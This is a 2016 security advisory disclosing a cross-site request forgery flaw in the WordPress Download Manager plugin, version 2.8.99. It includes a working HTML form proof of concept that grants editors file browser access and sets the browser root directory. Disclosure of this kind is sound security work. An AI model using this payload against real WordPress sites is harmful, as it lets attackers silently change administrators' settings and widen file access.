------------------------------------------------------------------------
Cross-Site Request Forgery in WordPress Download Manager Plugin
------------------------------------------------------------------------
Burak Kelebek, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery vulnerability has been found in the
WordPress Download Manager Plugin. By using this vulnerability an
attacker can change confidential settings of the plugin.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160722-0005

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WordPress Download Manager [2]
version 2.8.99.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available.

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
WordPress Download Manager [2] is a Files / Documents Management Plugin
and Complete e-Commerce Solution for selling digital products. WordPress
Download Manager plugin will help you to manage, track, control file
downloads & sell digital products easily from your WordPress site. Use
Password Protection, User Roles Protection to control access to your
files. And simply setup prices when you need to sell the digital item.
User can directly download free items and when item has a price user
will have to go through cart & checkout. It has easiest checkout option
to give the user better experience in purchasing an item and which
always increase the probability of successful completion of an order. As
rather than trying to convince customer to buy something, it would be
more helpful to think of a cart optimization as an action to remove
barrier to that goal.

It was discovered that WordPress Download Manager is vulnerable to
Cross-Site Request Forgery. 

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The Download Manager plugin lacks a CSRF (nonce) token on the request of
saving settings. Because of this an attacker is able to change
confidential settings like file browser access and browser base dir by
luring a logged-in admin to follow a malicious link containing the proof
of concept below. 

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
The proof of concept below gives file browser access to a user with
Editor privileges:
<html>
	<body>
		<form action="http://<target>/wp-admin/admin-ajax.php" method="POST">
			<input type="hidden" name="task" value="wdm_save_settings"/>
			<input type="hidden" name="action" value="wdm_settings"/>
			<input type="hidden" name="section" value="basic"/>
			<input type="hidden" name="wpdm_permission_msg" value="Access
Denied"/>
			<input type="hidden" name="wpdm_login_msg" value="<a
href='http://<target>/wp-login.php'>Please login to download</a>&#10;"/>
			<input type="hidden" name="_wpdm_file_browser_root"
value="/srv/www/wordpress-default/"/>
			<input type="hidden" name="_wpdm_file_browser_access[]"
value="editor"/>
			<input type="hidden" name="_wpdm_file_browser_access[]"
value="administrator"/>
			<input type="hidden" name="__wpdm_sanitize_filename" value="0"/>
			<input type="hidden" name="__wpdm_download_speed" value="4096"/>
			<input type="hidden" name="__wpdm_download_resume" value="1"/>
			<input type="hidden" name="__wpdm_support_output_buffer" value="1"/>
			<input type="hidden" name="__wpdm_open_in_browser" value="0"/>
			<input type="hidden" name="_wpdm_recaptcha_site_key" value=""/>
			<input type="hidden" name="_wpdm_recaptcha_secret_key" value=""/>
			<input type="hidden" name="__wpdm_disable_scripts[]" value=""/>
			<input type="hidden" name="__wpdm_login_url" value=""/>
			<input type="hidden" name="__wpdm_register_url" value=""/>
			<input type="hidden" name="__wpdm_user_dashboard" value=""/>
			<input type="submit"/>
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_download_manager_plugin.html
[2] https://wordpress.org/plugins/download-manager/